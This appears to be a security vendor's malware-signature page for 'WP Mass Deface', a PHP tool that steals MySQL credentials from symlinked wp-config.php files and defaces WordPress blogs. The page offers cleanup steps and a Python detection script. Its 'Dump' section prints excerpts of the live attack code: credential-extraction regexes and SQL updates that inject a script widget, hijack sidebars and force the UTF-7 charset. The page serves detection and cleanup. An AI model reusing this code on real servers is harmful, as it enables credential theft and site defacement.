Malware Signatures

php.hacktool.massdeface.001

WP Mass Deface is a tool that automates the defacement of WordPress blogs hosted on shared servers. It is used in the third stage of an attack, when the attackers have already compromised one of the accounts on the server and managed to create symlinks to the rest of the sites hosted there. By the time the attack starts they have a list of URLs to the wp-config.php files of all the sites on the compromised server (through the symlinks these files are served as plain text).
WP Mass Deface uses this list of wp-config.php files to obtain the MySQL credentials and the WordPress table prefix of each blog. It then connects to each database in turn and creates a WordPress text widget containing a "defacement message" on each blog. Additionally, it adds the message to the blog name.

Affecting

Any server with PHP enabled and MySQL installed. WordPress is not required for the attack to start, but this tool can only deface WordPress sites.

Cleanup

Delete the massdeface script. Find and delete the symlinks created by the attackers. Server admins should properly isolate user accounts and prevent Apache from following symlinks (this may be incompatible with some software, though).
You should also consider all MySQL credentials on this server compromised and have every server user change them. Additionally, changing all WordPress passwords is a good idea.
Scan your server for other types of malware, specifically for backdoors.
Defaced sites should repair their WordPress databases, specifically the "widget_text", "sidebars_widgets", "blogname" and "blog_charset" options in the wp_options table. Most of these options can be fixed directly in the WordPress admin interface:
remove the malicious messages from General Settings and from the widgets.
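
As an added example (not part of this signature page or the malware itself), the check below inspects rows exported from the wp_options table for the four indicators the dump leaves behind: a text widget whose body rewrites the page through unescape(), blog_charset forced to UTF-7, sidebar-1 holding only the injected text widget, and markup in the blog name. The sample rows, the wp_ prefix and the restore values (a text-widget array holding only _multiwidget, and UTF-8) are assumptions; sidebars_widgets is site-specific, so it is only flagged for manual repair.

```python
import re

# Indicators taken from the dump: the injected text widget replaces the whole
# document via unescape(), blog_charset is switched to UTF-7, and sidebar-1 is
# left holding only the injected "text-2" widget.
WIDGET_SCRIPT_RE = re.compile(
    r"document\.documentElement\.innerHTML\s*=\s*unescape\(", re.IGNORECASE)
HIJACKED_SIDEBAR = 's:9:"sidebar-1";a:1:{i:0;s:6:"text-2";}'
HTML_TAG_RE = re.compile(r"<[a-z!/][^>]*>", re.IGNORECASE)

# Restore values (assumption: these are the stock WordPress values).
CLEAN_WIDGET_TEXT = 'a:1:{s:12:"_multiwidget";i:1;}'
CLEAN_CHARSET = "UTF-8"


def check_options(rows, prefix="wp_"):
    """Inspect (option_name, option_value) rows from the {prefix}options table.

    Returns a list of (option_name, reason, fix_sql). fix_sql is None where
    the clean value is site-specific and has to be restored by hand.
    """
    table = f"{prefix}options"
    findings = []
    for name, value in rows:
        if name == "widget_text" and WIDGET_SCRIPT_RE.search(value):
            findings.append((name, "text widget rewrites the page via unescape()",
                             f"UPDATE `{table}` SET option_value='{CLEAN_WIDGET_TEXT}' "
                             "WHERE option_name='widget_text';"))
        elif name == "blog_charset" and value.strip().upper() == "UTF-7":
            findings.append((name, "charset forced to UTF-7",
                             f"UPDATE `{table}` SET option_value='{CLEAN_CHARSET}' "
                             "WHERE option_name='blog_charset';"))
        elif name == "sidebars_widgets" and HIJACKED_SIDEBAR in value:
            findings.append((name, "sidebar-1 holds only the injected text widget", None))
        elif name == "blogname" and HTML_TAG_RE.search(value):
            findings.append((name, "blog name contains HTML markup", None))
    return findings


# Constructed sample rows shaped like the values the script writes.
SAMPLE_ROWS = [
    ("blogname", "My Blog <h1>defaced</h1>"),
    ("blog_charset", "UTF-7"),
    ("widget_text", 'a:2:{i:2;a:3:{s:5:"title";s:0:"";s:4:"text";s:75:"<script>'
                    "document.documentElement.innerHTML = unescape('%3Ch1%3E');"
                    '</script>";s:6:"filter";b:0;}s:12:"_multiwidget";i:1;}'),
    ("sidebars_widgets", 'a:7:{s:19:"wp_inactive_widgets";a:1:{i:0;s:6:"meta-2";}'
                         's:9:"sidebar-1";a:1:{i:0;s:6:"text-2";}s:13:"array_version";i:3;}'),
]

if __name__ == "__main__":
    for option, reason, fix in check_options(SAMPLE_ROWS):
        print(f"{option}: {reason}" + (f"\n  {fix}" if fix else "  (fix manually)"))
```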

You can sign up with us and let our team remove the malware for you.

Dump

... excerpts ...

<title>SEYTANAUYDUM WP MASS</title>

...

<body bgcolor="black">
<center>
<pre>
__ __ __ __ _____ __
/ / | / | | __ / _|
/ / / __ | / | __ _ ___ ___ | | | | ___| |_ __ _ ___ ___
/ / / '_ | |/| |/ _` / __/ __| | | | |/ _ _/ _` |/ __/ _
/ /| |_) | | | | | (_| __ __ | |__| | __/ || (_| | (_| __/
/ / | .__/ |_| |_|__,_|___/___/ |_____/ ___|_| __,_|______|
| |
|_|
</pre>
</center>
<form method="POST" action="" >
<center>
<table border='1'><tr><td>List of All Symlink</td><td>
<input type="text" name="url" size="100" value="list.txt"></td></tr>

...

preg_match_all('|define.*(.*'DB_NAME'.*,.*'(.*)'.*).*;|isU',$code,$b1);
$db=$b1[1][0];
preg_match_all('|define.*(.*'DB_USER'.*,.*'(.*)'.*).*;|isU',$code,$b2);
$user=$b2[1][0];
preg_match_all('|define.*(.*'DB_PASSWORD'.*,.*'(.*)'.*).*;|isU',$code,$b3);
$db_password=$b3[1][0];
preg_match_all('|define.*(.*'DB_HOST'.*,.*'(.*)'.*).*;|isU',$code,$b4);
$host=$b4[1][0];
preg_match_all('|$table_prefix.*=.*'(.*)'.*;|isU',$code,$b5);

...

$s2=strToHex(($source));
$s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
$ls=strlen($s)-2;
$sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:"title";s:0:"";s:4:"text";s:$ls:"$s";s:6:"filter";b:0;}s:12:"_multiwidget";i:1;}' where option_name='widget_text'; ";
mysql_query($sql) ;
$sql="update ".$p."options set option_value='a:7:{s:19:"wp_inactive_widgets";a:6:{i:0;s:10:"archives-2";i:1;s:6:"meta-2";i:2;s:8:"search-2";i:3;s:12:"categories-2";i:4;s:14:"recent-posts-2";i:5;s:17:"recent-comments-2";}s:9:"sidebar-1";a:1:{i:0;s:6:"text-2";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}s:9:"sidebar-4";a:0:{}s:9:"sidebar-5";a:0:{}s:13:"array_version";i:3;}' where option_name='sidebars_widgets';";

...

$sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
@mysql_query($sql) ; ;
$sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";